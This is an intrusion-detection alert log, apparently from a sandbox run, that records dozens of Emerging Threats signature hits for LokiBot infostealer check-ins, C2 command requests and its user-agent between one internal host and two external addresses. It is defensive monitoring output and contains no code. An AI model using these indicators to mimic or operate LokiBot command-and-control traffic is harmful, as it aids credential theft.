Timestamp:	192.168.2.3188.114.97.349753802024313 08/11/22-06:42:25.207102
SID:	2024313
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349797802025381 08/11/22-06:43:05.379365
SID:	2025381
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349790802825766 08/11/22-06:42:56.651534
SID:	2825766
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349888802024318 08/11/22-06:44:00.133246
SID:	2024318
Source Port:	49888
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349747802021641 08/11/22-06:42:18.537201
SID:	2021641
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349843802024318 08/11/22-06:43:31.924022
SID:	2024318
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349780802025381 08/11/22-06:42:49.154690
SID:	2025381
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349884802025381 08/11/22-06:43:54.330408
SID:	2025381
Source Port:	49884
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349889802024313 08/11/22-06:44:01.764745
SID:	2024313
Source Port:	49889
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349762802025381 08/11/22-06:42:35.961537
SID:	2025381
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349742802021641 08/11/22-06:42:12.661275
SID:	2021641
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349752802024318 08/11/22-06:42:24.044623
SID:	2024318
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349795802025381 08/11/22-06:43:03.020333
SID:	2025381
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349752802024313 08/11/22-06:42:24.044623
SID:	2024313
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349789802025381 08/11/22-06:42:55.412963
SID:	2025381
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349843802021641 08/11/22-06:43:31.924022
SID:	2021641
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349745802021641 08/11/22-06:42:16.160936
SID:	2021641
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349889802024318 08/11/22-06:44:01.764745
SID:	2024318
Source Port:	49889
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349811802025381 08/11/22-06:43:10.662100
SID:	2025381
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349762802825766 08/11/22-06:42:35.961537
SID:	2825766
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349890802025381 08/11/22-06:44:03.457387
SID:	2025381
Source Port:	49890
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349764802021641 08/11/22-06:42:41.209817
SID:	2021641
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349749802021641 08/11/22-06:42:20.745320
SID:	2021641
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349883802021641 08/11/22-06:43:53.308240
SID:	2021641
Source Port:	49883
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349756802025381 08/11/22-06:42:28.447484
SID:	2025381
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349800802024313 08/11/22-06:43:08.046752
SID:	2024313
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349766802024313 08/11/22-06:42:42.773950
SID:	2024313
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349879802825766 08/11/22-06:43:48.403290
SID:	2825766
Source Port:	49879
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349875802825766 08/11/22-06:43:47.334573
SID:	2825766
Source Port:	49875
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349746802025381 08/11/22-06:42:17.452589
SID:	2025381
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349778802021641 08/11/22-06:42:46.945645
SID:	2021641
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349897802025381 08/11/22-06:44:08.828123
SID:	2025381
Source Port:	49897
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349832802025381 08/11/22-06:43:19.747801
SID:	2025381
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349882802024318 08/11/22-06:43:51.663595
SID:	2024318
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349759802025381 08/11/22-06:42:31.695874
SID:	2025381
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349882802024313 08/11/22-06:43:51.663595
SID:	2024313
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349755802825766 08/11/22-06:42:27.395952
SID:	2825766
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349782802025381 08/11/22-06:42:50.570997
SID:	2025381
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349800802024318 08/11/22-06:43:08.046752
SID:	2024318
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349777802021641 08/11/22-06:42:45.276948
SID:	2021641
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349895802025381 08/11/22-06:44:06.157277
SID:	2025381
Source Port:	49895
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349791802825766 08/11/22-06:42:58.117986
SID:	2825766
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349763802024313 08/11/22-06:42:39.324991
SID:	2024313
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349798802024318 08/11/22-06:43:06.576803
SID:	2024318
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349763802024318 08/11/22-06:42:39.324991
SID:	2024318
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349792802025381 08/11/22-06:42:59.404301
SID:	2025381
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349859802025381 08/11/22-06:43:42.759258
SID:	2025381
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349881802021641 08/11/22-06:43:50.015660
SID:	2021641
Source Port:	49881
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349840802021641 08/11/22-06:43:28.505356
SID:	2021641
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349774802024313 08/11/22-06:42:44.099150
SID:	2024313
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349766802025381 08/11/22-06:42:42.773950
SID:	2025381
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349757802025381 08/11/22-06:42:29.610436
SID:	2025381
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349774802024318 08/11/22-06:42:44.099150
SID:	2024318
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349875802021641 08/11/22-06:43:47.334573
SID:	2021641
Source Port:	49875
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349887802825766 08/11/22-06:43:58.405291
SID:	2825766
Source Port:	49887
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349811802024313 08/11/22-06:43:10.662100
SID:	2024313
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349764802025381 08/11/22-06:42:41.209817
SID:	2025381
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349789802024313 08/11/22-06:42:55.412963
SID:	2024313
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349792802825766 08/11/22-06:42:59.404301
SID:	2825766
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349755802025381 08/11/22-06:42:27.395952
SID:	2025381
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349762802021641 08/11/22-06:42:35.961537
SID:	2021641
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349892802825766 08/11/22-06:44:04.916628
SID:	2825766
Source Port:	49892
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349798802024313 08/11/22-06:43:06.576803
SID:	2024313
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349888802021641 08/11/22-06:44:00.133246
SID:	2021641
Source Port:	49888
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349760802021641 08/11/22-06:42:32.923604
SID:	2021641
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349742802825766 08/11/22-06:42:12.661275
SID:	2825766
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349832802021641 08/11/22-06:43:19.747801
SID:	2021641
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349897802021641 08/11/22-06:44:08.828123
SID:	2021641
Source Port:	49897
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349744802024313 08/11/22-06:42:15.052087
SID:	2024313
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349743802021641 08/11/22-06:42:14.045456
SID:	2021641
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349889802825766 08/11/22-06:44:01.764745
SID:	2825766
Source Port:	49889
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349796802021641 08/11/22-06:43:04.193279
SID:	2021641
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349838802021641 08/11/22-06:43:24.421881
SID:	2021641
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349830802024318 08/11/22-06:43:16.837786
SID:	2024318
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349853802024313 08/11/22-06:43:40.660156
SID:	2024313
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349898802825766 08/11/22-06:44:09.907279
SID:	2825766
Source Port:	49898
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349850802021641 08/11/22-06:43:33.879385
SID:	2021641
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349859802024313 08/11/22-06:43:42.759258
SID:	2024313
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349788802024318 08/11/22-06:42:54.331478
SID:	2024318
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349790802021641 08/11/22-06:42:56.651534
SID:	2021641
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349832802825766 08/11/22-06:43:19.747801
SID:	2825766
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349859802024318 08/11/22-06:43:42.759258
SID:	2024318
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349830802024313 08/11/22-06:43:16.837786
SID:	2024313
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349743802825766 08/11/22-06:42:14.045456
SID:	2825766
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349785802025381 08/11/22-06:42:51.879415
SID:	2025381
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349758802021641 08/11/22-06:42:30.656105
SID:	2021641
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 188.114.97.3 - Destination IP: 192.168.2.3

Timestamp:	188.114.97.3192.168.2.380497972025483 08/11/22-06:43:05.476572
SID:	2025483
Source Port:	80
Destination Port:	49797
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349750802025381 08/11/22-06:42:21.832277
SID:	2025381
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349764802825766 08/11/22-06:42:41.209817
SID:	2825766
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349888802825766 08/11/22-06:44:00.133246
SID:	2825766
Source Port:	49888
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349850802825766 08/11/22-06:43:33.879385
SID:	2825766
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349890802024313 08/11/22-06:44:03.457387
SID:	2024313
Source Port:	49890
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349761802825766 08/11/22-06:42:34.002289
SID:	2825766
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349892802025381 08/11/22-06:44:04.916628
SID:	2025381
Source Port:	49892
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349789802024318 08/11/22-06:42:55.412963
SID:	2024318
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349887802021641 08/11/22-06:43:58.405291
SID:	2021641
Source Port:	49887
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349889802021641 08/11/22-06:44:01.764745
SID:	2021641
Source Port:	49889
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349759802021641 08/11/22-06:42:31.695874
SID:	2021641
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349838802825766 08/11/22-06:43:24.421881
SID:	2825766
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349890802024318 08/11/22-06:44:03.457387
SID:	2024318
Source Port:	49890
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349748802024313 08/11/22-06:42:19.613257
SID:	2024313
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

